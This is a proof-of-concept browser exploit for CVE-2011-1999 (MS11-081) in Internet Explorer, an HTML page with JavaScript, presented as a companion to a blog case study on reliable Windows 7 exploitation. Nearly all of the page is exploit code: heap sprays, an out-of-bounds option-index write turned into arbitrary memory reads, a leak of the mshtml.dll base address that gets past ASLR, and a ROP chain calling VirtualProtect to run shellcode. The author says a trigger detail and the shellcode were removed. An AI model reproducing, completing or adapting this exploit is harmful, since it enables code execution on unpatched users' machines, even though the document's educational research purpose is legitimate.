Below is the PoC code for CVE-2011-1999 (MS11-081) that accompanies my blog article "Reliable Windows 7 Exploitation: A Case Study" http://ifsec.blogspot.com/2012/02/reliable-windows-7-exploitation-case.html Some notes about the PoC code: - The exploit uses a single vulnerability to both bypass ASLR and execute the payload without requiring any non-ASLR module in memory. - One tiny detail required for triggering the vulnerability has been removed, so the exploit (as given below) should not work, even on vulnerable systems. No, I won't tell you what it is. Sorry kids, this is for educational purposes only. - All offsets in the code were correct for mshtml.dll at the time this exploit code was written. As some time has passed between then and the time the vulnerability was patched, they won't be correct for many vulnerable versions of this module. Writing the exploit that doesn't rely on any hardcoded offsets is left as an exercise for the reader (more difficult, but certainly possible with the combination of the techniques used in the PoC below). <html> <head> </head> <body> <script type="text/javascript"> <!-- //originally, windows 7 compatible calc.exe shellcode from SkyLined var scode = "removed"; var newstack,newstackaddr; var fakeobj; var spray,spray2,selarray,readindex,readaddr,optarryaddr; var elms = new Array(); var optarray; var mshtmlbase; //option object that is to be corrupted var corruptedoption; var corruptedoptionaddr; var corruptaddr; function strtoint(str) { return str.charCodeAt(1)*0x10000 + str.charCodeAt(0); } function inttostr(num) { return String.fromCharCode(num%65536,Math.floor(num/65536)); } function crash() { var o = new Option(); selarray[99].options.add(o,-0x20000000); } function readmem(addr) { if(addr < readaddr) alert("Error, can't read that address"); return strtoint(spray[readindex].substr((addr-readaddr)/2,2)); } function readmem2(addr,size) { if(addr < readaddr) alert("Error, can't read that address"); return spray[readindex].substr((addr-readaddr)/2,size/2); } function overwrite(addr) { try { var index = (addr-optarryaddr)/4 - 0x40000000; selarray[99].options.add(optarray.pop(),index); } catch(err) {} } function getreadaddr() { readaddr = 0; var indexarray = new Array(); var tmpaddr = 0; var i,index; index = readmem(tmpaddr); indexarray.push(index); while(1) { tmpaddr += 0x100000; index = readmem(tmpaddr); for(i=0;i<indexarray.length;i++) { if(indexarray[i]==index+1) { readaddr = readmem(tmpaddr-0x24)-i*0x100000+0x24; return 1; } else if(indexarray[i]==index-1) { readaddr = readmem(tmpaddr-0x20)-i*0x100000+0x24; return 1; } } indexarray.push(index); } } //leverages the vulnerability into memory disclosure function initread() { //overwrite something in a heap spray slide try { selarray[99].options.add(optarray.pop(),-100000000/4); } catch(err) {} //now find what and where exectly did we overwrite readindex = -1; var i; for(i=1;i<200;i++) { if(spray[0].substring(2,spray[0].length-2)!=spray[i].substring(2,spray[0].length-2)) { readindex = i; break; } } if(readindex == -1) { alert("Error overwriring first spray"); return 0; } var start=2,len=spray[readindex].length-2,mid; while(len>10) { mid = Math.round(len/2); mid = mid - mid%2; if(spray[readindex].substr(start,mid) != spray[readindex-1].substr(start,mid)) { len = mid; } else { start = start+mid; len = len-mid; //if(spray[readindex].substr(start,mid) == spray[readindex-1].substr(start,mid)) alert("error"); } } for(i=start;i<(start+20);i=i+2) { if(spray[readindex].substr(i,2) != spray[readindex-1].substr(i,2)) { break; } } //overwrite the string length try { selarray[99].options.add(optarray.pop(),-100000000/4-i/2-1); } catch(err) {} if(spray[readindex].length == spray[readindex-1].length) alert("error overwriting string length"); //readaddr = strtoint(spray[readindex].substr((0x100000-4-0x20+4)/2,2))+0x24; getreadaddr(); optarryaddr = readaddr + 100000000 + i*2; return 1; } function trysploit() { //create some helper objects for(var i =0; i < 100; i++) { elms.push(document.createElement('div')); } //force the option cache to rebuild itself var tmp1 = selarray[99].options[70].text; //overwrite the CTreeNode pointer overwrite(corruptaddr); //read the address of the option object we overwrited with var optadr = readmem(corruptaddr); //delete the option object... selarray[99].options.remove(0); CollectGarbage(); //...and allocate some strings in its place for(var i = 0; i < elms.length; i++) { elms[i].className = fakeobj; } //verify we overwrote the deleted option object successfully if(readmem(optadr) != strtoint(fakeobj.substr(0,2))) return 0; alert("success, calc.exe should start once you close this message box"); //now do something with the corrupted option object corruptedoption.parentNode.click(); } function hs() { //first heap spray, nop slide + shellcode spray = new Array(200); var pattern = unescape("%u0C0C%u0C0C"); while(pattern.length<(0x100000/2)) pattern+=pattern; pattern = pattern.substr(0,0x100000/2-0x100); for(var i=0;i<200;i++) { spray[i] = [inttostr(i)+pattern+scode].join(""); } //fill small gaps, we wan everything _behind_ our heap spray so that we can read it var asmall = new Array(10000); pattern = "aaaa"; while(pattern.length<500) pattern+=pattern; for(var i=0;i<10000;i++) { asmall[i]=[pattern+pattern].join(""); } //create some select and option elements selarray = new Array(100); for(var i=0;i<100;i++) { selarray[i] = document.createElement("select"); for(var j=0;j<100;j++) { var o = new Option("oooooooooooooooooo","ooooooooooooooooooooo"); selarray[i].options.add(o,0); } } //create some extra option elements optarray = new Array(10000); for(var i=0;i<10000;i++) { optarray[i] = new Option("oooooooooooooooooo","ooooooooooooooooooooo"); } //enable memory disclosure if(initread()==0) return; //force the option cache to rebuild itself var tmp1 = selarray[99].options[60].text; //get the address of some option element to be corrupted, also remove it from its select element, we don't want anything else messing with it corruptedoptionaddr = readmem(optarryaddr+60*4); corruptedoption = selarray[99].options[60]; selarray[99].options.remove(60); //get the base address of mshtml.dll based on the vtable address inside the option object mshtmlbase = readmem(corruptedoptionaddr)-0xFC0C0; alert("base address of mshtml.dll : " + mshtmlbase.toString(16)); //we'll overwrite the pointer to the CTreeNode object, compute its address corruptaddr = corruptedoptionaddr+0x14; //second heap-spray, this one will act as a stack (we'll exchange stack pointer with a pointer into this) spray2 = new Array(200); //some address that is likely to be inside the "stack" newstackaddr = optarryaddr+100000000; newstackaddr-=newstackaddr%0x1000; newstackaddr+=0x24; //assemble the "stack" so that it calls VirtualProtect on the firs shellcode and then jumps into it through return-oriented-programming newstack = inttostr(newstackaddr+0x10)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(newstackaddr+0x14)+inttostr(mshtmlbase+0x14EF7)+inttostr(mshtmlbase+0x1348)+inttostr(mshtmlbase+0x801E8)+inttostr(readaddr+0x100000-0x24)+inttostr(0x100000)+inttostr(0x40)+inttostr(readaddr+0x1000)+inttostr(readaddr+0x101000)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(mshtmlbase+0x1B43F); while(newstack.length<(0x1000/2)) newstack+=unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA"); newstack = newstack.substr(0,0x1000/2); while(newstack.length<(0x100000/2)) newstack+=newstack; newstack = newstack.substr(0,0x100000/2-0x100); for(var i=0;i<200;i++) { spray2[i] = [newstack].join(""); } //constract a fake object which will replace a deleted option object (it has to be the same size) //fakeobj = unescape("%u4141%u4141")+inttostr(newstackaddr)+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141"); fakeobj = unescape("%u4141%u4141%u4141%u4141")+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141"); //loop until we either achieve command execution or fail for(var i=0;i<100;i++) { trysploit(); } alert("Exploit failed, try again"); } hs(); --> </script> </body> </html>